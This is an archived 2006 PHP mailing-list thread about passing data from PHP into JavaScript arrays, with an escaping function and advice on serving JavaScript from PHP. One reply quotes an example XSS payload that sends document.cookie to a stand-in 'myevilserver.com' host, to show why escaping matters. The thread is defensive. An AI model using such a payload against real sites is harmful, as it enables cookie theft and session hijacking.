NYCPHP Meetup

NYPHP.org

[nycphp-talk] Passing JavaScript arrays

Cliff Hirsch cliff at pinestream.com
Mon Jul 10 08:19:13 EDT 2006


Interesting approach. How big was the array? It seems like this method
might produce unreasonably long URLs if there is extensive data.

-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org]
On Behalf Of Peter Sawczynec
Sent: Saturday, July 08, 2006 8:25 AM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Another possible basic technique for the PHP to JavaScript string data
transfer. 

Once upon creating a JavaScripted slideshow that rewrote the innerHTML
in div tags to change images and their complex multi-line descriptions,
I found this ditty worked for dynamically creating the JavaScript array
of image/text/HTML data.

1) In PHP do: urlencode($str_with_HTML_and_special_chars)

2) In the JavaScript do:
replace(unescape($str_with_HTML_and_special_chars),'+',' ')

Has not choked on anything.


Warmest regards,
 
Peter Sawczynec,
Technology Director
PSWebcode
_Design & Interface
_Ecommerce
_Database Management
ps at pswebcode.com
718.796.1951
www.pswebcode.com



-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org]
On Behalf Of Cliff Hirsch
Sent: Friday, July 07, 2006 1:47 PM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Thanks to all for the great responses -- very helpful. I've summarized
below:

> For security, do I just escape the output like any other variable
destined for the browser?

It depends where its coming from and what you're using it for. For
example, I have dynamic JS array's coming from the DB that may contain
HTML, and will eventually populate drop-down menu's.  For these, I pass
through a 'js cleansing' routine to trim, remove HTML tags, convert to
UTF-8 (or whatever), remove any line-breaks and escape all quotes. But
I'd be extremely wary if your JS data is coming from GET or POST.  I can
see a variable like the following jacking a JS array:

');
location='http://myevilserver.com/steal?your_cookies='+document.cookie;
//

If you're echoing a string from php into a javascript string var, you
need to escape it. Here's an example. The escapeString function here is
slightly modified from the one used in CakePHP's javascript helper:

<?php
function escapeString($string) {
   $escape = array("\r\n" => '\n', "\r" => '\n', "\n" => '\n', '"' =>
'\"', "'" => "\\'");
   return str_replace(array_keys($escape), array_values($escape),
$string); }

$string = "It's good to \"escape\" strings";
?>

<script language="javascript" type="text/javascript">
// <![CDATA[
   var string = '<?php echo escapeString($string); ?>';
   alert(string);
// ]]>
</script>

If you don't want the JS to be inline, you can create a separate PHP
file that only outputs JavaScript code:

<script type="text/javascript" src="js.php"></script>

Just make sure js.php has the following before you start outputting
JavaScript:

header('content-type:text/javascript');

(From what I understand, Apache will by default cache .js files but
force a request for .php templates.  This may affect the chi of your
app..  man..)

_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
New York PHP Conference and Expo 2006
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php

_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
New York PHP Conference and Expo 2006
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php




More information about the talk mailing list